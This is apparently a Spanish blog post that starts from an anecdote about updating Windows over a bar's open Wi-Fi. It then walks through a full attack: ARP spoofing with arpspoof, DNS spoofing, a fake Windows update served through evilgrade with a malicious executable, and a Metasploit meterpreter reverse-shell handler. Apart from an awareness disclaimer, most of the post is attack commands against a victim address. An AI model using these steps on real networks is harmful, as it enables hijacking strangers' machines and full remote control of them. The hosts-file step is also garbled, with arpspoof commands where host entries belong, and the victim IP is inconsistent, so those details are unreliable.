top of page

Actualizaciones sí, pero ¿Cuando?

Este pasado sábado estube con un amigo en un bar normal y corriente aquí en cartagena, mi amigo, una persona que no tiene absolútamente ¡NADA! que ver con la informática, no es hacker, ni cracker, ni forma parte de los de Anonimous, ni de Lulzsec, ni nada asi, de hecho está estudiandose la carrera de bellas artes, sacó de un maletín su portatil con un windows 7 Ultimate NO pirata, y yo que lo estaba viendo, veo que derrepente abre el asistente de actualizaciones de windows y antes de que le llegase a dar a "instalar actualizaciones" se me ocurre detenerle, mi amigo, extrañado por lo que habia hecho me dice:

     - Pero Diego, ¿por qué has hecho eso? pero si tu siempre dices que siempre hay que estar actualizado por que se solucionan un monton de fallos de seguridad, se parchean un montón de bugs, y demas"

     - Si que es verdad que hay que tener todos los programas actualizados siempre al día, y demas, pero esque resulta, que las redes wifi abiertas como la de este bar, son inseguras.

     - Bueno, pero, aun que sean inseguras no hay problema ninguno cuando lo único que estoy haciendo es descargarme una actualización que me ofrece el asistente de actualizaciones del mismísimo windows, ¿o sí...?

En fin... A mi amigo le contesté, y le estube explicando el porque si que es peligroso hacer esto de actualizar desde una red insegura y todo eso, y me ha parecido una buena idea explicar el por qué es peligroso actualizar desde redes inseguras.

Bueno como ya todos sabréis no me hago responsable del mal uso que se le pueda atribuir al contenido de esta página, el fin del contenido de esta página es tan solo el advertir e impartir el conocimiento sobre auditorias de seguridad y pentesting a las personas con el fin de acabar con los malos habitos en seguridad informática y evitar un posible hackeo a terceros.

¿Por qué es un problema actualizar desde redes inseguras?

 

Ya sé que muchas personas podrán pensar que no resulta ningun problema, que es una tonteria tan siquiera pensar que alguien nos pueda hackear solo por actualizar el windows, pero lo cierto, es que es muy posible que alguna persona os hackeé por hacer esto y lo cierto es que es bastante facil, solo con hacer un ataque de  Man In The Middle (de Hombre en el medio) podría interceptar las peticiones que se realizan a un DNS en este caso al windows para pedir las actualizaciones, y colarnos un troyano y obtener una shell nuestra, y para quien no controle del tema, ya os lo digo yo, cuando un hacker tiene acceso a una shell, ya tiene acceso absoluto a tu ordenador, pero bueno, vamos a dejarnos de habler sobre la parte teórica, y vamos ya a la práctica.

Paso 1.

Para poder interceptar los paquetes, antes debemos realizar un Man in th Middle, así que lo que vamos a hacer, es enviar de manera dual paquetes al router diciendole que somos, en este caso, la ip 192.168.1.10 (Ip victima) y a la dirección 192.168.1.10 como que somos el router (dirección ip: 192.168.1.1), en nuestro BackTrack abrimos una shell y colocamos:

- arpspoof -t 192.168.1.10 192.168.1.1

Abrimos otra shell y viceversa:

- arpspoof -t 192.168.1.1 192.168.1.10

 

Escribimos esto por algun documento de texto y lo guardamos como "dnsspoof.hosts" en el escritorio para que no se pierda:

 

# arpspoof -t 192.168.1.10 (<-- Dirección ip victima) 192.168.1.1 (<-- Dirección ip del router)

# arpspoof -t 192.168.1.1 (<-- Dirección ip del router) 192.168.1.10 (<-- Dirección ip victima)

 

Y con esto ya estamos engañando al router y los paquetes que vallan hacia la maquina 192.168.1.18 pasaran por mi y viceversa.

Paso 2.

Ahora vamos a abrir el evilgrade:

- cd /pentest/exploits/isr-evilgrade/

- ./evilgrade

 

 

 

 

 

- show modules (<-- Para mostrar los modulos)

 

 

- Configure winupdate (<-- para configurar el módulo de windows)

- Show options (<-- Para mostrar las opciones)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

- set agent ./agent/updatemaligno.exe

 

 

 

Paso 3.

Ahora lo que tenemos que hacer es un ataque de DNS (dnsspoof) para capturar las peticiones dns con el comando:

- dnsspoof -i eth1 -f /root/Desktop/dnsspoof.hosts

 

 

 

​- start (<-- Para lanzar el ataque)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Paso 4.

Para finalizar necesitamos un handler para la reverse shell, asi que vamos a ello:

- msfconsole

​​

- use exploit/multi/handler

- set payload windows/meterpreter/reverse_tcp

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

- set LHOST 192.168.1.5 (<-- tu dirección ip)

- exploit

 

 

 

 

 

 

 

 

 

 

 

                                                                                                                                                                                                       

Y ya en tal que la otra maquina actualice nos dará una sessión y ya tendremos acceso completo a la otra maquina:

 

 

 

 

 

 

 

 

 

 

a

bottom of page